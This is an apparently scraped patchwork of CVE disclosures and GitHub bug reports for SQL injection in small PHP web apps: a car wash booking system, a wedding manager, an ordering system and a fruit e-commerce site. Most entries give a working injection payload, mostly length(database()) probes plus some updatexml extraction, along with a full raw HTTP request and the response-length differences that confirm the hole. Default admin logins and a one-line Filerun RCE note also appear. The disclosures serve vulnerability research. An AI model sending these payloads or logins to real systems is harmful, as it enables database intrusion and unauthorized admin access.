Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/classes/Master.php?f=get_vehicle_service.

Permalink

Cannot retrieve contributors at this time

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=get\_vehicle\_service

Vulnerability location: /ocwbs/classes/Master.php?f=get\_vehicle\_service, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: id=3' and length(database()) =8--+ // Leak place ---> id

POST /ocwbs/classes/Master.php?f\=get\_vehicle\_service HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/?p=booking
Content-Length: 34
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
id=3' and length(database()) =8--+

When length (database ()) = 7, Content-Length: 30

When length (database ()) = 8, Content-Length: 304

CVE-2022-31354: bug_report/SQLi-11.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=delete\_service

Vulnerability location: /ocwbs/classes/Master.php?f=delete\_service, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ocwbs/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31346: bug_report/SQLi-5.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/classes/Master.php?f=delete_vehicle.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=delete\_vehicle

Vulnerability location: /ocwbs/classes/Master.php?f=delete\_vehicle, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ocwbs/classes/Master.php?f\=delete\_vehicle HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/admin/?page=vehicles
Content-Length: 65
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31347: bug_report/SQLi-4.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection. via /Wedding-Management/admin/budget.php?booking_id=.

Permalink

**Wedding Management System v1.0 by codeastr.com has SQL injection**

Author： k0xx

The password for the backend login account is: admin@mail.com/Password@123

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: /Wedding-Management/admin/budget.php?booking\_id=

Vulnerability location: /Wedding-Management/admin/budget.php?booking\_id=,booking\_id

\[+\] Payload: /Wedding-Management/admin/budget.php?booking\_id=31%20and%20length(database())%20=%209&user\_id=31 // Leak place ---> booking\_id

Current database name: dbwedding,length is 9

GET /Wedding\-Management/admin/budget.php?booking\_id\=31%20and%20length(database())%20\=%209&user\_id\=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 8, Content-Length: 814

When length (database ()) = 9, Content-Length: 9894

CVE-2022-30835: bug_report/SQLi-12.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/bookings/update_status.php?id=.

Permalink

Cannot retrieve contributors at this time

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/bookings/update\_status.php?id=

Vulnerability location: /ocwbs/admin/bookings/update\_status.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/bookings/update\_status.php?id=3%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/bookings/update\_status.php?id\=3%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 2012

When length (database ()) = 8, Content-Length: 2021

CVE-2022-31348: bug_report/SQLi-6.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/vehicles/manage_vehicle.php?id=.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/vehicles/manage\_vehicle.php?id=

Vulnerability location: /ocwbs/admin/vehicles/manage\_vehicle.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/vehicles/manage\_vehicle.php?id=5%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/vehicles/manage\_vehicle.php?id\=5%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 1978 

When length (database ()) = 8, Content-Length: 1997

CVE-2022-31350: bug_report/SQLi-7.md at main · k0xx11/bug_report

Online Ordering System By janobe 2.3.2 is vulneranle to SQL Injection via /ordering/index.php?q=products&id=.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System By janobe has SQL injection vulnerability**

Author： k0xx

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=products&id=

Vulnerability location: /ordering/index.php?q=products&id= //id is Injection point

\[+\]Payload: /ordering/index.php?q=products&id=2%27%20and%20length(database())%20=12--+ //id is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q\=products&id\=2%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 11, Content-Length: 17564 

When length (database ()) = 12, Content-Length: 24330

CVE-2022-31327: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/services/view_service.php?id=.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/services/view\_service.php?id=

Vulnerability location: /ocwbs/admin/services/view\_service.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/services/view\_service.php?id=2%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/services/view\_service.php?id\=2%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 856 

When length (database ()) = 8, Content-Length: 932

CVE-2022-31353: bug_report/SQLi-8.md at main · k0xx11/bug_report

Ecommerce-project-with-php-and-mysqli-Fruits-Bazar 1.0 is vulnerable to SQL Injection in \search_product.php via the keyword parameters.

creativesaiful / **Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-** Public

*   Notifications
*   Fork 2
*   Star 3
    

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

3 stars 2 forks

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

creativesaiful somthing

c07a847

Sep 16, 2021

somthing

c07a847

**Git stats**

*   **25** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

admin

assets

includes

json

addtocart.php

all\_product.php

catagory.php

ecommerce.sql

exist\_order.php

index.php

readme.txt

search\_product.php

single\_product.php

user\_login.php

user\_password\_recover.php

user\_password\_update.php

user\_register.php

userprofile copy.php

userprofile.php

**readme.txt**

1\. First create a database name ecommerce in your database. Than import ecommerce.sql file in your ecommerce database.

admin access:
saifulislamsapon@gmail.com
pass:1234


user access:
saifulislamsapon@gmail.com
123

**About**

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

**Topics**

ecommerce-website php-website php-project core-php project-samples php-admin-panel project-example basic-ecommerce full-stack-web-development

**Resources**

Readme

**Stars**

**3** stars

**Watchers**

**1** watching

**Forks**

**2** forks

**Releases**

No releases published

**Packages**

No packages published  

**Languages**

*   CSS 36.7%
*   JavaScript 29.0%
*   SCSS 25.1%
*   PHP 8.6%
*   Hack 0.6%

CVE-2022-30478: GitHub - creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-: This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

Tag

#php